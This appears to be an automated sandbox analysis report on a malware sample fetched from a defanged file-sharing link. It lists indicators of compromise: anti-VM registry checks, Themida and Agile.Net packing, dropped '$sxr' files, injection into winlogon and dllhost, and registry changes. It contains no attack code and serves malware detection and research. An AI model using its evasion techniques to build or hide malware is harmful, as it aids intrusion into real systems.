hxxps://gofile[.]io/d/c5Rqpr

Resubmissions

15-03-2023 00:22

230315-anx89saf46 10

15-03-2023 00:20

230315-am2v3aaf42 4

14-03-2023 23:32

230314-3jfsmsad98 10

Analysis

max time kernel
91s
max time network
128s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
14-03-2023 23:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/c5Rqpr

Score

10^/10

agilenet evasion themida

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

5352c375-9aa2-426c-83e1-b486588001ac.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 640 created 608	640	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe	winlogon.exe
PID 6384 created 608	6384	$sxr-powershell.exe	winlogon.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

ImGL.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ImGL.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ImGL.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ImGL.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ImGL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ImGL.exe

Executes dropped EXE 4 IoCs

Processes:

5352c375-9aa2-426c-83e1-b486588001ac.bat.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe

pid process

640 5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
6384 $sxr-powershell.exe
5504 $sxr-powershell.exe
5220 $sxr-powershell.exe
Loads dropped DLL 1 IoCs

Processes:

ImGL.exe

pid process

5476 ImGL.exe

pid	process
640	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
6384	$sxr-powershell.exe
5504	$sxr-powershell.exe
5220	$sxr-powershell.exe

pid	process
5476	ImGL.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral1/memory/5476-750-0x0000022FA8330000-0x0000022FA947A000-memory.dmp	agile_net
behavioral1/memory/5476-761-0x0000022FAAFC0000-0x0000022FAAFD8000-memory.dmp	agile_net

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\c5b5f892-515e-4453-a73a-a05dde02712b\AgileDotNetRT64.dll	themida
C:\Users\Admin\AppData\Local\Temp\c5b5f892-515e-4453-a73a-a05dde02712b\AgileDotNetRT64.dll	themida
behavioral1/memory/5476-758-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp	themida
behavioral1/memory/5476-759-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp	themida
behavioral1/memory/5476-764-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp	themida
behavioral1/memory/5476-782-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp	themida
behavioral1/memory/5476-786-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp	themida
behavioral1/memory/5476-827-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp	themida
behavioral1/memory/5476-980-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp	themida
behavioral1/memory/5476-998-0x00007FFEF0F60000-0x00007FFEF17BF000-memory.dmp	themida

Drops file in System32 directory 6 IoCs

Processes:

5352c375-9aa2-426c-83e1-b486588001ac.bat.exe

description	ioc	process
File created	C:\Windows\System32\vcruntime140d.dll	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
File created	C:\Windows\System32\ucrtbased.dll	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
File created	C:\Windows\System32\vcruntime140_1d.dll	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

ImGL.exe

pid process

5476 ImGL.exe

pid	process
5476	ImGL.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

5352c375-9aa2-426c-83e1-b486588001ac.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 640 set thread context of 4472	640	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe	dllhost.exe
PID 6384 set thread context of 5892	6384	$sxr-powershell.exe	dllhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\e0966c92-6919-49c7-93fc-75f74081c03d.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230315003255.pma	setup.exe

Drops file in Windows directory 4 IoCs

Processes:

5352c375-9aa2-426c-83e1-b486588001ac.bat.exe

description	ioc	process
File created	C:\Windows\$sxr-powershell.exe	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
File created	C:\Windows\$sxr-seroxen1\$sxr-nircmd.exe	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
File created	C:\Windows\$sxr-seroxen1\$sxr-Uni.bat	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

5660 1544 WerFault.exe

pid	pid_target	process	target process
5660	1544	WerFault.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 64 IoCs

Processes:

msedge.exeImGL.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\LogicalViewMode = "3"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	ImGL.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Pictures"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	ImGL.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1092616257"	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3\MRUListEx = ffffffff	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000d8632e226c45d901c14d81bcd556d901c14d81bcd556d90114000000	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3\0\NodeSlot = "7"	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1"	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 03000000020000000100000000000000ffffffff	ImGL.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic"	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000100000000000000ffffffff	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000e0859ff2f94f6810ab9108002b27b3d90500000058000000	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3\NodeSlot = "6"	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0"	ImGL.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3\MRUListEx = 00000000ffffffff	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 14002e80d43aad2469a5304598e1ab02f9417aa80000	ImGL.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell	ImGL.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	ImGL.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	ImGL.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings	ImGL.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

Processes:

powershell.exemsedge.exemsedge.exeidentity_helper.exemsedge.exe5352c375-9aa2-426c-83e1-b486588001ac.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exe$sxr-powershell.exe

pid	process
3232	powershell.exe
3232	powershell.exe
3408	msedge.exe
3408	msedge.exe
5084	msedge.exe
5084	msedge.exe
6172	identity_helper.exe
6172	identity_helper.exe
6912	msedge.exe
6912	msedge.exe
640	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
640	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
640	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
640	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
4472	dllhost.exe
4472	dllhost.exe
4472	dllhost.exe
4472	dllhost.exe
640	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
640	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
6384	$sxr-powershell.exe
6384	$sxr-powershell.exe
6384	$sxr-powershell.exe
6384	$sxr-powershell.exe
5892	dllhost.exe
5892	dllhost.exe
5892	dllhost.exe
5892	dllhost.exe
6384	$sxr-powershell.exe
6384	$sxr-powershell.exe
5504	$sxr-powershell.exe
5504	$sxr-powershell.exe
5504	$sxr-powershell.exe
5220	$sxr-powershell.exe
5220	$sxr-powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

ImGL.exe

pid process

5476 ImGL.exe

pid	process
5476	ImGL.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 38 IoCs

Processes:

msedge.exe

pid	process
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exe5352c375-9aa2-426c-83e1-b486588001ac.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exe$sxr-powershell.exe

description	pid	process
Token: SeDebugPrivilege	3232	powershell.exe
Token: SeDebugPrivilege	640	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
Token: SeDebugPrivilege	640	5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
Token: SeDebugPrivilege	4472	dllhost.exe
Token: SeDebugPrivilege	6384	$sxr-powershell.exe
Token: SeDebugPrivilege	6384	$sxr-powershell.exe
Token: SeDebugPrivilege	5892	dllhost.exe
Token: SeDebugPrivilege	5504	$sxr-powershell.exe
Token: SeDebugPrivilege	5220	$sxr-powershell.exe

Suspicious use of FindShellTrayWindow 12 IoCs

Processes:

msedge.exe

pid	process
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

ImGL.exe

pid process

5476 ImGL.exe
5476 ImGL.exe
5476 ImGL.exe
5476 ImGL.exe
5476 ImGL.exe

pid	process
5476	ImGL.exe
5476	ImGL.exe
5476	ImGL.exe
5476	ImGL.exe
5476	ImGL.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 5084 wrote to memory of 1140	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 1140	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3108	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3408	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 3408	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
